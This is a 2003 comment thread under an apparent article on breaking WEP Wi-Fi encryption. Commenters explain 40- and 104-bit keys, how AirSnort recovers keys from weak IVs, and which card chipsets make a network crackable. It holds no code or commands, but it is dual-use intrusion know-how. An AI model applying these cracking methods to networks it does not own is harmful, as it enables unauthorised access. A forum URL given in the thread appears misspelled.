Women in Technology

Hear us Roar

  Dispelling the Myth of Wireless Security
Subject:   Wireless Security
Date:   2003-08-15 14:25:53
From:   anonymous2
Your 5 character password shows that you did not crack a wep password but a ascii password. If it had been 64 bit wep it would have been 10 characters and exponentially harder to crack. If wireless is so easy to crack why did you choose the shortest possible password to crack?
Full Threads Oldest First

Showing messages 1 through 4 of 4.

  • Wireless Security
    2003-08-16 04:02:24  trevmar [View]

    Actually, I have found that Airsnort cracks both short and long keys in about the same amount of time (1 million to 10 million packets). The number of packets needed is more dependent on the actual code and the point in the pingflood sequence at which the AP is at any point in time (because certain regions of the WEP key space are more susceptible than others).

    I haven't really noticed any extra security from using 'clever' HEX codes rather than the ascii shorthand.

    However, Lucent changed its Orinoco firmware in September 2002 to stop its cards transmitting weak packets. I have never managed to crack an Orinoco card running up-to-date software.

    Likewise for Cisco - the LM350 series of cards are invisible when running WEP.

    But you only need one user on the network to be using a card based on the PRISM or some other chipset (eg, D-Link, Linksys, Zoom) and the whole network can be easily cracked.

    Anyway, good work Rob, an excellent explanation...

    Trevor Marshall
    • Wireless Security
      2003-11-16 14:46:05  trystano [View]

      Hi all,

      I was intending to find a forum on this site, but haven't managed to find one :-(.

      Anyway, I have a question to ask on security of m-commerce. I am doing a independant study that involves me researching the security measures taken when carrying out transactions over wireless networks.

      I was wondering if PKI is used as the main technology used to secure wireless transactions. Is WEP similar to this? If not, what is WEP used for?

      Can someone please assit me (if possible, direct me to some decent researches).

      • Wireless Security
        2003-11-19 19:14:07  anonymous2 [View]

        You can find the best forum for wireless questions at www.netstubler.com
        Make sure to register to be able to access the full forum.

  • About WEP keys
    2003-08-15 15:11:13  rflicken [View]

    The various key lengths quoted by manufacturers can certainly be confusing.

    The original 802.11b specification defined a 40-bit user-specified key. This key is combined with a 24-bit Initialization Vector (the IV), a random number that is part of the WEP algorithm. Together, this yields 64 bits of "key", although the IV is actually sent in the clear!

    Likewise, 104-bit WEP is used with the IV to yield 128 bits of "key". This is why user-defined ASCII keys are five characters long (5 characters times 8 bits/character == 40 bits) or thirteen characters long (13 characters times 8 bits/character == 104 bits). The user doesn't define the IV. Even when specifying long hex keys, these are simply hashed into a 40 bit or 104 bit sequence, and combined with the IV.

    Using the real time analysis mode of AirSnort (as I did in this experiment), it doesn't try brute force the key space, but instead collects weak IVs that the AP transmits. Since the IVs are sent in the clear, collecting them is just a matter of observing enough traffic. The key length (40 or 104) does make some difference, but not the exponential increase in work that you might expect. From AirSnort's home page:

    "AirSnort requires approximately 5-10 million encrypted packets to be gathered. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second."

    I chose to use the 40 bit (or 64 bit, if you like) WEP key for a couple of reasons. It is by far the most common WEP implementation in use, it's the only one defined by the 802.11b standard, and that's all the hardware I had on hand (at the time) would support. When I scrape together an AP and a couple of machines that will do 104 bit WEP, I'll certainly give it another run.

    I highly recommend reading any of these papers for more detail about the weaknesses of WEP than I have room to talk about here.

    Or buy my book. ;)